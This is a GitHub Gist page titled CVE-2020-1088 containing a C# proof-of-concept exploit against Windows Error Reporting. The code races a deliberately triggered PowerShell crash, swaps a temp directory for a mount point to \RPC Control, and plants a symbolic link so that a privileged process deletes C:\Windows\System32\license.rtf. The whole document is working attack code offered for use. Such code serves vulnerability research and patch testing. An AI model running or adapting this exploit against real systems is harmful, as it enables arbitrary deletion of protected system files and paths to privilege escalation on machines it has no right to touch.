Last active
May 4, 2021 19:16
-
-
Save fisboger/82c0c5c2befab226f4751e9e028912f0 to your computer and use it in GitHub Desktop.
CVE-2020-1088
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using NtApiDotNet; | |
| using System; | |
| using System.Collections.Generic; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Linq; | |
| using System.Text; | |
| using System.Threading; | |
| using System.Threading.Tasks; | |
| namespace WerArbitraryFileDelete | |
| { | |
| class Program | |
| { | |
| static FileSystemWatcher Watcher; | |
| static void Main(string[] args) | |
| { | |
| Process.GetCurrentProcess().PriorityClass = ProcessPriorityClass.RealTime; | |
| Thread.CurrentThread.Priority = ThreadPriority.Highest; | |
| var path = $@"C:\Users\{Environment.UserName}\AppData\Local\Temp\"; | |
| Watcher = new FileSystemWatcher(path); | |
| Watcher.Created += Watcher_Created; | |
| Watcher.EnableRaisingEvents = true; | |
| new Thread(() => { Thread.CurrentThread.Priority = ThreadPriority.Highest; HackAway(); }).Start(); | |
| // Give the thread time to start | |
| Thread.Sleep(1000); | |
| using (Process myProcess = new Process()) | |
| { | |
| myProcess.StartInfo.UseShellExecute = false; | |
| myProcess.StartInfo.FileName = "powershell.exe"; | |
| myProcess.StartInfo.Arguments = "-Command \"[Environment]::FailFast('Error')\""; | |
| myProcess.Start(); | |
| } | |
| Console.ReadKey(); | |
| } | |
| private static void Watcher_Created(object sender, FileSystemEventArgs e) | |
| { | |
| if (!e.FullPath.Contains(".")) | |
| { | |
| Dir = e.FullPath; | |
| } | |
| } | |
| private static string Dir = ""; | |
| static void HackAway() | |
| { | |
| while (true) | |
| { | |
| try | |
| { | |
| File.Delete($@"{Dir}\WPR_initiated_DiagTrackMiniLogger_OneTrace User Logger 20200113 1 Event Collector_0.buf.etl"); | |
| NtFile.CreateMountPoint($@"\??\{Dir}", @"\RPC Control", ""); | |
| SetLink(@"\RPC Control", "WPR_initiated_DiagTrackMiniLogger_OneTrace User Logger 20200113 1 Event Collector_0.buf.etl", @"C:\Windows\System32\license.rtf"); | |
| break; | |
| } | |
| catch (Exception) { } | |
| } | |
| } | |
| private static void SetLink(string linkpath, string filename, string newpath) | |
| { | |
| Console.WriteLine($@"Creating symlink from {linkpath}\{filename} to \??\{newpath}"); | |
| NtSymbolicLink.Create($@"{linkpath}\{filename}", null, SymbolicLinkAccessRights.GenericAll, $@"\??\{newpath}"); | |
| } | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment